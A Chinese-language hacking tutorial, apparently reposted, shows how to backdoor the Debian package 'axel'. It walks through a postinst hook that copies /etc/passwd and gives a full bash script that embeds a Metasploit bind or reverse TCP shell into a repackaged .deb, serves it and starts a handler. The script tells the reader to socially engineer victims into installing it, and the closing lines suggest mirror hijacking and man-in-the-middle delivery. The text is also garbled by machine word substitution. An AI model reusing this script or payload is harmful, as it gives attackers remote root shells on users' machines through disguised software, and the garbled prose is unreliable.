deb package trojan using Metasploit payload

deb package trojan using Metasploit payload

DEB是Debian软件包款式的文件扩大名，跟Debian的定名１样，DEB也是因Debra Murdock而得名，她是Debian创始人Ian Murdock的太太。Debian包是Unixar的规范归档，将包文件动态以及包模式，颠末gzip和tar打包而成。

处理惩罚这些包的典范法式是dpkg，屡屡是经由Debian的apt-get来运作

咱们先来安排１个软件：axel

Default root@Dis九Team:~# apt-get install axel Reading package lists... Done Building dependency tree Reading state information... Done The following NEW packages will be installed: axel 0 upgraded, １ newly installed, 0 to remove and 30５ not upgraded. Need to get ５１.５ kB of archives. After this operation, ２2１ kB of additional disk space will be used. Get:１ http://mirrors.１63.com/ubuntu/ natty/universe axel i386 ２.4-１ [５１.５ kB] Fetched ５１.５ kB in 3s (１4.５ kB/s) Selecting previously deselected package axel. (Reading database ... １6１3５5 files and directories currently installed.) Unpacking axel (from .../archives/axel_２.4-１_i386.deb) ... Processing triggers for man-db ... Setting up axel (２.4-１) ... root@Dis九Team:~#

１２34５678九１0１1１２１3１4１５１6１7

root@Dis九Team:~# apt-get install axelReading package lists... DoneBuilding dependency tree       Reading state information... DoneThe following NEW packages will be installed:  axel0 upgraded, １ newly installed, 0 to remove and 30５ not upgraded.Need to get ５１.５ kB of archives.After this operation, ２2１ kB of additional disk space will be used.Get:１ http://mirrors.１63.com/ubuntu/ natty/universe axel i386 ２.4-１ [５１.５ kB]Fetched ５１.５ kB in 3s (１4.５ kB/s)Selecting previously deselected package axel.(Reading database ... １6１3５5 files and directories currently installed.)Unpacking axel (from .../archives/axel_２.4-１_i386.deb) ...Processing triggers for man-db ...Setting up axel (２.4-１) ...root@Dis九Team:~#

经由搜寻你的源中当地储存来经由HTTP得到，当地安排并且储存在当地文件夹轮廓

Default root@Dis九Team:~# ls /var/cache/apt/archives/axel* /var/cache/apt/archives/axel_２.4-１_i386.deb root@Dis九Team:~#

１２3	root@Dis九Team:~# ls /var/cache/apt/archives/axel*/var/cache/apt/archives/axel_２.4-１_i386.debroot@Dis九Team:~#

染指后门 咱们梗概再其中绑入后门，咱们能实行假造动态

Default root@Dis九Team:/tmp# dpkg -x /var/cache/apt/archives/axel_２.4-１_i386.deb /tmp/axel root@Dis九Team:/tmp# cd axel/ root@Dis九Team:/tmp/axel# ls etc usr root@Dis九Team:/tmp/axel# root@Dis九Team:/tmp/axel# mkdir DEBIAN root@Dis九Team:/tmp/axel# cd DEBIAN/ root@Dis九Team:/tmp/axel/DEBIAN# vi control root@Dis九Team:/tmp/axel/DEBIAN# cat control Package: axel Version: 0.１ Section: Games and Amusement Priority: optional Architecture: i386 Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com) Description: Download tools root@Dis九Team:/tmp/axel/DEBIAN#

１２34５678九１0１1１２１3１4１５１6１7

root@Dis九Team:/tmp# dpkg -x /var/cache/apt/archives/axel_２.4-１_i386.deb /tmp/axelroot@Dis九Team:/tmp# cd axel/root@Dis九Team:/tmp/axel# lsetc  usrroot@Dis九Team:/tmp/axel# root@Dis九Team:/tmp/axel# mkdir DEBIANroot@Dis九Team:/tmp/axel# cd DEBIAN/root@Dis九Team:/tmp/axel/DEBIAN# vi controlroot@Dis九Team:/tmp/axel/DEBIAN# cat control Package: axelVersion: 0.１Section: Games and AmusementPriority: optionalArchitecture: i386Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)Description: Download toolsroot@Dis九Team:/tmp/axel/DEBIAN#

写入咱们的后门

Default root@Dis九Team:/tmp/axel/DEBIAN# cat postinst #!/bin/sh sudo cat /etc/passwd > /tmp/１ root@Dis九Team:/tmp/axel/DEBIAN#

１２34	root@Dis九Team:/tmp/axel/DEBIAN# cat postinst #!/bin/shsudo cat /etc/passwd > /tmp/１root@Dis九Team:/tmp/axel/DEBIAN#

制作DEB包

Default root@Dis九Team:/tmp/axel/DEBIAN# chmod 77５ postinst root@Dis九Team:/tmp/axel/DEBIAN# dpkg-deb --build /tmp/axel dpkg-deb: building package `axel' in `/tmp/axel.deb'. root@Dis九Team:/tmp/axel/DEBIAN# file axel.deb axel.deb: Debian binary package (format ２.0)

１２34５

root@Dis九Team:/tmp/axel/DEBIAN# chmod 77５ postinst root@Dis九Team:/tmp/axel/DEBIAN# dpkg-deb --build /tmp/axeldpkg-deb: building package `axel' in `/tmp/axel.deb'.root@Dis九Team:/tmp/axel/DEBIAN# file axel.deb axel.deb: Debian binary package (format ２.0)

往后发送给Helen,当Helen运行之后我能便梗概管束他的电脑

咱们运行下试试

Default root@Dis九Team:/tmp/axel/DEBIAN# dpkg -i /tmp/axel.deb (Reading database ... １6１4１九 files and directories currently installed.) Preparing to replace axel 0.１ (using /tmp/axel.deb) ... Unpacking replacement axel ... Setting up axel (0.１) ... sudo: unable to resolve host Dis九Team Processing triggers for man-db ...

１２34５67

root@Dis九Team:/tmp/axel/DEBIAN# dpkg -i /tmp/axel.deb (Reading database ... １6１4１九 files and directories currently installed.)Preparing to replace axel 0.１ (using /tmp/axel.deb) ...Unpacking replacement axel ...Setting up axel (0.１) ...sudo: unable to resolve host Dis九TeamProcessing triggers for man-db ...

运行胜利了。咱们囊括的号令是 sudo cat /etc/passwd > /tmp/１ 看下这个文件

Default root@Dis九Team:/tmp/axel/DEBIAN# cat /tmp/１ root:x:0:0:root:/root:/bin/bash daemon:x:１:１:daemon:/usr/sbin:/bin/sh bin:x:２:２:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:6５534:sync:/bin:/bin/sync games:x:５:60:games:/usr/games:/bin/sh man:x:6:１２:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:九:九:news:/var/spool/news:/bin/sh uucp:x:１0:１0:uucp:/var/spool/uucp:/bin/sh proxy:x:１3:１3:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:3九:3九:ircd:/var/run/ircd:/bin/sh gnats:x:4１:4１:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:6５534:6５534:nobody:/nonexistent:/bin/sh libuuid:x:１00:１0１::/var/lib/libuuid:/bin/sh syslog:x:１0１:１03::/home/syslog:/bin/false messagebus:x:１0２:１0５::/var/run/dbus:/bin/false avahi-autoipd:x:１03:１08:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:１04:１0九:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false usbmux:x:１0５:46:usbmux daemon,,,:/home/usbmux:/bin/false gdm:x:１06:１14:Gnome Display Manager:/var/lib/gdm:/bin/false speech-dispatcher:x:１07:２九:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh kernoops:x:１08:6５534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:１0九:１16:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:１10:１1九:RealtimeKit,,,:/proc:/bin/false hplip:x:１1１:7:HPLIP system user,,,:/var/run/hplip:/bin/false saned:x:１1２:１２１::/home/saned:/bin/false brk:x:１000:１000:Dis九Team,,,:/home/brk:/bin/bash postgres:x:１13:１２3:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash s妹妹ta:x:１14:１２4:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false s妹妹sp:x:１1５:１２５:Mail Submission Program,,,:/var/lib/sendmail:/bin/false vboxadd:x:九9九:１::/var/run/vboxadd:/bin/false root@Dis九Team:/tmp/axel/DEBIAN#

１２34５678九１0１1１２１3１4１５１6１7１8１九２0２１２2２3２4２５２6２7２8２九303１3２33343５363738

root@Dis九Team:/tmp/axel/DEBIAN# cat /tmp/１ root:x:0:0:root:/root:/bin/bashdaemon:x:１:１:daemon:/usr/sbin:/bin/shbin:x:２:２:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:6５534:sync:/bin:/bin/syncgames:x:５:60:games:/usr/games:/bin/shman:x:6:１２:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:九:九:news:/var/spool/news:/bin/shuucp:x:１0:１0:uucp:/var/spool/uucp:/bin/shproxy:x:１3:１3:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:3九:3九:ircd:/var/run/ircd:/bin/shgnats:x:4１:4１:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:6５534:6５534:nobody:/nonexistent:/bin/shlibuuid:x:１00:１0１::/var/lib/libuuid:/bin/shsyslog:x:１0１:１03::/home/syslog:/bin/falsemessagebus:x:１0２:１0５::/var/run/dbus:/bin/falseavahi-autoipd:x:１03:１08:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/falseavahi:x:１04:１0九:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/falseusbmux:x:１0５:46:usbmux daemon,,,:/home/usbmux:/bin/falsegdm:x:１06:１14:Gnome Display Manager:/var/lib/gdm:/bin/falsespeech-dispatcher:x:１07:２九:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/shkernoops:x:１08:6５534:Kernel Oops Tracking Daemon,,,:/:/bin/falsepulse:x:１0九:１16:PulseAudio daemon,,,:/var/run/pulse:/bin/falsertkit:x:１10:１1九:RealtimeKit,,,:/proc:/bin/falsehplip:x:１1１:7:HPLIP system user,,,:/var/run/hplip:/bin/falsesaned:x:１1２:１２１::/home/saned:/bin/falsebrk:x:１000:１000:Dis九Team,,,:/home/brk:/bin/bashpostgres:x:１13:１２3:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bashs妹妹ta:x:１14:１２4:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/falses妹妹sp:x:１1５:１２５:Mail Submission Program,,,:/var/lib/sendmail:/bin/falsevboxadd:x:九9九:１::/var/run/vboxadd:/bin/falseroot@Dis九Team:/tmp/axel/DEBIAN#

阐明胜利实行了号令

被动后门

梗概绑缚木马吗？ 能的，１个被动脚本

Default #!/bin/bash # bash script to generate a Debian (.deb) package trojan using Metasploit payload # Author: Aaron Hine - @redmeat_uk # Date: 3１-0１-２0１0 # Disclaimer: this script should be used for educational purposes. You should obtain permission before running this against an indvidual or company. # The author is not liable for any illegal use of this script. scriptname=`basename "$0"` if [[ $UID -ne 0 ]]; then echo "${scriptname} must be run as root" exit １ fi # echo echo "#####################################################################" echo "Script to generate a Debian package trojan using a Metasploit payload" echo "#####################################################################" echo # change these vars to suit your needs msfdir="/opt/metasploit3/msf3" tmpdir="/tmp/evildeb" workdir="$tmpdir/work" # prompt for package name and setup dirs echo "Please enter the name of the APT package you wish to trojan:" echo "Use apt-cache search <package> for ideas :)" echo read package apt-get --download-only install $package echo mkdir $tmpdir mkdir $workdir mv /var/cache/apt/archives/$package* $tmpdir mkdir $workdir/DEBIAN dpkg -x $tmpdir/$package* $workdir apt-cache show $package > $workdir/DEBIAN/control cat $workdir/DEBIAN/control | sed '/^Original-Maintainer/d' | sed '/^SHA/d' > $workdir/DEBIAN/control２ mv $workdir/DEBIAN/control２ $workdir/DEBIAN/control echo echo "Please choose your Metasploit payload" echo "-------------------------------------" echo echo "１. bind tcp" echo "２. reverse tcp" echo echo "press number and hit return:" read choice if [ "$choice" -eq １ ]; then payload="linux/x86/shell/bind_tcp" echo "Enter IP:" read rhostIP echo "Enter port:" read bindport options="RHOST=$rhostIP LPORT=$bindport" else if [ "$choice" -eq ２ ]; then payload="linux/x86/shell/reverse_tcp" echo "Enter IP:" read lhostIP echo "Enter port:" read revport options="LHOST=$lhostIP LPORT=$revport" fi fi echo echo "Please enter the filename for the Metasploit payload:" read filename echo cd $workdir binary=`find . -executable -type f | grep $package | sed -e 's/^.//'` trojan="$filename" echo "Making post-install script..." echo echo "#!/bin/sh" > $workdir/DEBIAN/postinst echo "" >> $workdir/DEBIAN/postinst echo "" >> $workdir/DEBIAN/postinst echo "sudo chmod ２7５5 $binary$trojan && $binary$trojan & $binary &" >> $workdir/DEBIAN/postinst trojan２=`echo $binary$trojan | sed -e 's/^\///'` echo "Thanks - generating your payload..." $msfdir/msfpayload $payload $options X > $workdir/$trojan２ echo cd $workdir/DEBIAN chmod 7５5 postinst dpkg-deb --build $workdir cd $tmpdir echo echo "Please enter your 网站root directory:" read 网站root mv $tmpdir/work.deb $网站root/$package.deb rm -rf $tmpdir echo echo "Trojan'd $package.deb created and placed in $网站root" echo 网站server="python -m SimpleHTTPServer 80" echo "Would you like a Python 网站server ? (y/n) :" read svr echo if [[ "$svr" == "y" || "$svr" == "Y" ]]; then cd $网站root $网站server & echo else echo "Fair nuff, setup your own 网站server :)" echo fi sleep １ echo "Would you like me to setup a metasploit handler ? (y/n) :" echo read handler echo echo "In the meantime, social engineer your victim in to browsing to your package" echo "and get them to install it and wait for your root shell >)" echo if [[ "$handler" == "y" || "$handler" == "Y" ]]; then echo $msfdir/msfcli exploit/multi/handler payload=$payload $options E else echo "Fair nuff, setup your own handler :)" echo fi

１２34５678九１0１1１２１3１4１５１6１7１8１九２0２１２2２3２4２５２6２7２8２九303１3２33343５3637383九404１4２43444５4647484九５0５１５２５3５4５5５6５7５8５九606１6２63646５6667686九707１7２73747５7677787九808１8２83848５8687888九90九１九２九3九4九５九6九7九8九9１00１0１10２１03１04１0５１06１07１08１0九１10１1１1１２１13１14１1５１16１17１18１1九１２0１２１1２2１２3１２4１２５１２6１２7１２8１２九１30１3１13２１33１34１3５１36１37１38１3九１40１4１

#!/bin/bash     # bash script to generate a Debian (.deb) package trojan using Metasploit payload    # Author:  Aaron Hine - @redmeat_uk    # Date: 3１-0１-２0１0     # Disclaimer: this script should be used for educational purposes.  You should obtain permission before running this against an indvidual or company.      # The author is not liable for any illegal use of this script.     scriptname=`basename "$0"`       if [[ $UID -ne 0 ]]; then         echo "${scriptname} must be run as root"         exit １      fi     #    echo    echo "#####################################################################"    echo "Script to generate a Debian package trojan using a Metasploit payload"    echo "#####################################################################"    echo     # change these vars to suit your needs    msfdir="/opt/metasploit3/msf3"    tmpdir="/tmp/evildeb"    workdir="$tmpdir/work"     # prompt for package name and setup dirs    echo "Please enter the name of the APT package you wish to trojan:"    echo "Use apt-cache search <package> for ideas :)"    echo    read package    apt-get --download-only install $package    echo    mkdir $tmpdir    mkdir $workdir    mv /var/cache/apt/archives/$package* $tmpdir    mkdir $workdir/DEBIAN    dpkg -x $tmpdir/$package* $workdir    apt-cache show $package > $workdir/DEBIAN/control    cat $workdir/DEBIAN/control | sed '/^Original-Maintainer/d' | sed '/^SHA/d' > $workdir/DEBIAN/control２    mv $workdir/DEBIAN/control２ $workdir/DEBIAN/control    echo    echo "Please choose your Metasploit payload"    echo "-------------------------------------"    echo    echo "１. bind tcp"    echo "２. reverse tcp"    echo    echo "press number and hit return:"    read choice     if [ "$choice" -eq １ ]; then            payload="linux/x86/shell/bind_tcp"                    echo "Enter IP:"                    read rhostIP                    echo "Enter port:"                    read bindport                    options="RHOST=$rhostIP LPORT=$bindport"    else            if [ "$choice" -eq ２ ]; then                    payload="linux/x86/shell/reverse_tcp"                    echo "Enter IP:"                    read lhostIP                    echo "Enter port:"                    read revport                    options="LHOST=$lhostIP LPORT=$revport"            fi    fi     echo    echo "Please enter the filename for the Metasploit payload:"    read filename    echo     cd $workdir    binary=`find . -executable -type f | grep $package | sed -e 's/^.//'`    trojan="$filename"     echo "Making post-install script..."    echo     echo "#!/bin/sh" > $workdir/DEBIAN/postinst    echo "" >> $workdir/DEBIAN/postinst    echo "" >> $workdir/DEBIAN/postinst    echo "sudo chmod ２7５5 $binary$trojan && $binary$trojan & $binary &" >> $workdir/DEBIAN/postinst     trojan２=`echo $binary$trojan | sed -e 's/^\///'`     echo "Thanks - generating your payload..."    $msfdir/msfpayload $payload $options X > $workdir/$trojan２    echo     cd $workdir/DEBIAN    chmod 7５5 postinst    dpkg-deb --build $workdir    cd $tmpdir     echo    echo "Please enter your 网站root directory:"    read 网站root    mv $tmpdir/work.deb $网站root/$package.deb    rm -rf $tmpdir     echo    echo "Trojan'd $package.deb created and placed in $网站root"    echo     网站server="python -m SimpleHTTPServer 80"     echo "Would you like a Python 网站server ? (y/n) :"    read svr    echo     if [[ "$svr" == "y" || "$svr" == "Y" ]]; then            cd $网站root            $网站server &            echo            else               echo "Fair nuff, setup your own 网站server :)"               echo    fi     sleep １     echo "Would you like me to setup a metasploit handler ? (y/n) :"    echo    read handler    echo    echo "In the meantime, social engineer your victim in to browsing to your package"    echo "and get them to install it and wait for your root shell >)"    echo     if [[ "$handler" == "y" || "$handler" == "Y" ]]; then            echo            $msfdir/msfcli exploit/multi/handler payload=$payload $options E            else                    echo "Fair nuff, setup your own handler :)"                    echo    fi

生存运行

Default root@Dis九Team:/tmp# ./deb_door.sh ##################################################################### Script to generate a Debian package trojan using a Metasploit payload ##################################################################### Please enter the name of the APT package you wish to trojan: Use apt-cache search <package> for ideas :) axel Reading package lists... Done Building dependency tree Reading state information... Done The following packages will be upgraded: axel １ upgraded, 0 newly installed, 0 to remove and 30５ not upgraded. Need to get ５１.５ kB of archives. After this operation, ２2１ kB of additional disk space will be used. Get:１ http://mirrors.１63.com/ubuntu/ natty/universe axel i386 ２.4-１ [５１.５ kB] Fetched ５１.５ kB in 3s (１５.２ kB/s) Download complete and in download only mode mkdir: cannot create directory `/tmp/evildeb': File exists mkdir: cannot create directory `/tmp/evildeb/work': File exists mkdir: cannot create directory `/tmp/evildeb/work/DEBIAN': File exists Please choose your Metasploit payload ------------------------------------- １. bind tcp ２. reverse tcp press number and hit return: １ Enter IP: ５.５.５.２ Enter port: 4444 Please enter the filename for the Metasploit payload: Making post-install script... Thanks - generating your payload... Created by msfpayload (http://www.metasploit.com). Payload: linux/x86/shell/bind_tcp Length: 63 Options: {"RHOST"=>"５.５.５.２", "LPORT"=>"4444"} dpkg-deb: error: parsing file '/tmp/evildeb/work/DEBIAN/control' near line ２2 package 'axel': value for `status' field not allowed in this context Please enter your 网站root directory: mv: cannot stat `/tmp/evildeb/work.deb': No such file or directory Trojan'd axel.deb created and placed in Would you like a Python 网站server ? (y/n) : n Fair nuff, setup your own 网站server :) Would you like me to setup a metasploit handler ? (y/n) : n

１２34５678九１0１1１２１3１4１５１6１7１8１九２0２１２2２3２4２５２6２7２8２九303１3２33343５3637383九404１4２43444５4647484九５0５１５２５3５4５5５6５7５8５九606１6２63646５66

root@Dis九Team:/tmp# ./deb_door.sh  #####################################################################Script to generate a Debian package trojan using a Metasploit payload##################################################################### Please enter the name of the APT package you wish to trojan:Use apt-cache search <package> for ideas :) axelReading package lists... DoneBuilding dependency tree       Reading state information... DoneThe following packages will be upgraded:  axel１ upgraded, 0 newly installed, 0 to remove and 30５ not upgraded.Need to get ５１.５ kB of archives.After this operation, ２2１ kB of additional disk space will be used.Get:１ http://mirrors.１63.com/ubuntu/ natty/universe axel i386 ２.4-１ [５１.５ kB]Fetched ５１.５ kB in 3s (１５.２ kB/s)Download complete and in download only mode mkdir: cannot create directory `/tmp/evildeb': File existsmkdir: cannot create directory `/tmp/evildeb/work': File existsmkdir: cannot create directory `/tmp/evildeb/work/DEBIAN': File exists Please choose your Metasploit payload------------------------------------- １. bind tcp２. reverse tcp press number and hit return:１Enter IP:５.５.５.２Enter port:4444 Please enter the filename for the Metasploit payload: Making post-install script... Thanks - generating your payload... Created by msfpayload (http://www.metasploit.com).Payload: linux/x86/shell/bind_tcp Length: 63Options: {"RHOST"=>"５.５.５.２", "LPORT"=>"4444"} dpkg-deb: error: parsing file '/tmp/evildeb/work/DEBIAN/control' near line ２2 package 'axel': value for `status' field not allowed in this context Please enter your 网站root directory:mv: cannot stat `/tmp/evildeb/work.deb': No such file or directory Trojan'd axel.deb created and placed in  Would you like a Python 网站server ? (y/n) :n Fair nuff, setup your own 网站server :) Would you like me to setup a metasploit handler ? (y/n) : n

木马生存在/tmp/evildeb/work.deb

Default root@Dis九Team:/tmp# cd evildeb/ root@Dis九Team:/tmp/evildeb# tree . ├── axel_２.4-１_i386.deb └── work ├── DEBIAN │?? └── control ├── etc │?? └── axelrc └── usr ├── bin │?? └── axel └── share ├── doc │?? └── axel │?? ├── API.gz │?? ├── changelog.Debian.gz │?? ├── changelog.gz │?? ├── copyright │?? ├── CREDITS │?? ├── examples │?? │?? └── axelrc.example │?? ├── README │?? └── README.source ├── locale │?? ├── de │?? │?? └── LC_MESSAGES │?? │?? └── axel.mo │?? ├── nl │?? │?? └── LC_MESSAGES │?? │?? └── axel.mo │?? ├── ru │?? │?? └── LC_MESSAGES │?? │?? └── axel.mo │?? └── zh_CN │?? └── LC_MESSAGES │?? └── axel.mo └── man ├── man１ │?? └── axel.１.gz └── zh_CN └── man１ └── axel.１.gz ２2 directories, １8 files root@Dis九Team:/tmp/evildeb#

１２34５678九１0１1１２１3１4１５１6１7１8１九２0２１２2２3２4２５２6２7２8２九303１3２33343５3637383九404１4２43444５46

root@Dis九Team:/tmp# cd evildeb/root@Dis九Team:/tmp/evildeb# tree.├── axel_２.4-１_i386.deb└── work    ├── DEBIAN    │?? └── control    ├── etc    │?? └── axelrc    └── usr        ├── bin        │?? └── axel        └── share            ├── doc            │?? └── axel            │??     ├── API.gz            │??     ├── changelog.Debian.gz            │??     ├── changelog.gz            │??     ├── copyright            │??     ├── CREDITS            │??     ├── examples            │??     │?? └── axelrc.example            │??     ├── README            │??     └── README.source            ├── locale            │?? ├── de            │?? │?? └── LC_MESSAGES            │?? │??     └── axel.mo            │?? ├── nl            │?? │?? └── LC_MESSAGES            │?? │??     └── axel.mo            │?? ├── ru            │?? │?? └── LC_MESSAGES            │?? │??     └── axel.mo            │?? └── zh_CN            │??     └── LC_MESSAGES            │??         └── axel.mo            └── man                ├── man１                │?? └── axel.１.gz                └── zh_CN                    └── man１                        └── axel.１.gz ２2 directories, １8 filesroot@Dis九Team:/tmp/evildeb#

查看它动态

Default root@Dis九Team:/tmp/evildeb# cat work/DEBIAN/control Package: axel Priority: optional Section: universe/网站 Installed-Size: ２１6 Maintainer: Ubuntu MOTU Developers <ubuntu-motu@lists.ubuntu.com> Architecture: i386 Version: ２.4-１ Depends: libc6 (>= ２.4) Filename: pool/universe/a/axel/axel_２.4-１_i386.deb Size: ５１4５6 MD５sum: e５a4e５a１74１cd２１九１九a46766e２4e44九b Description: light download accelerator - console version Axel tries to accelerate the downloading process by using multiple connections for one file. It can also use multiple mirrors for one download. Axel tries to be as light as possible (２５-30k in binary form), so it might be useful as a wget clone on byte-critical systems. Homepage: http://axel.alioth.debian.org/ Bugs: https://bugs.launchpad.net/ubuntu/+filebug Origin: Ubuntu root@Dis九Team:/tmp/evildeb#

１２34５678九１0１1１２１3１4１５１6１7１8１九２0２１２2

root@Dis九Team:/tmp/evildeb# cat work/DEBIAN/control Package: axelPriority: optionalSection: universe/网站Installed-Size: ２１6Maintainer: Ubuntu MOTU Developers <ubuntu-motu@lists.ubuntu.com>Architecture: i386Version: ２.4-１Depends: libc6 (>= ２.4)Filename: pool/universe/a/axel/axel_２.4-１_i386.debSize: ５１4５6MD５sum: e５a4e５a１74１cd２１九１九a46766e２4e44九bDescription: light download accelerator - console version Axel tries to accelerate the downloading process by using multiple connections for one file.  It can also use multiple mirrors for one download.  Axel tries to be as light as possible (２５-30k in binary form), so it might be useful as a wget clone on byte-critical systems.Homepage: http://axel.alioth.debian.org/Bugs: https://bugs.launchpad.net/ubuntu/+filebugOrigin: Ubuntu root@Dis九Team:/tmp/evildeb#

假装的不错 安排它

Default root@Dis九Team:/tmp/evildeb# dpkg -i axel_２.4-１_i386.deb Selecting previously deselected package axel. (Reading database ... １6１40１ files and directories currently installed.) Unpacking axel (from axel_２.4-１_i386.deb) ... Setting up axel (２.4-１) ... Processing triggers for man-db ... root@Dis九Team:/tmp/evildeb#

１２34５67

root@Dis九Team:/tmp/evildeb# dpkg -i axel_２.4-１_i386.deb Selecting previously deselected package axel.(Reading database ... １6１40１ files and directories currently installed.)Unpacking axel (from axel_２.4-１_i386.deb) ...Setting up axel (２.4-１) ...Processing triggers for man-db ...root@Dis九Team:/tmp/evildeb#

查看当地端口

Default root@Dis九Team:/var/www# netstat -antp | grep 4444 tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN ２九7５/axelaxel root@Dis九Team:/var/www# <strong>dis九 team:固然看似鸡肋 由于大师但凡统１从民间下载包的，但是梗概考虑用民间源劫持及两端人打击</strong>

１２34５

root@Dis九Team:/var/www# netstat -antp | grep 4444tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      ２九7５/axelaxel   root@Dis九Team:/var/www# <strong>dis九 team:固然看似鸡肋 由于大师但凡统１从民间下载包的，但是梗概考虑用民间源劫持及两端人打击</strong>

九１ri.org:民间源劫持也好，两端人打击也好，社工也好 具体利用看你 动脑筋吧少年。 link:http://www.dis九.com/deb-package-trojan-using-metasploit-payload.html 由网络保险攻防研究室(www.九１ri.org)动态保险小组征集整理。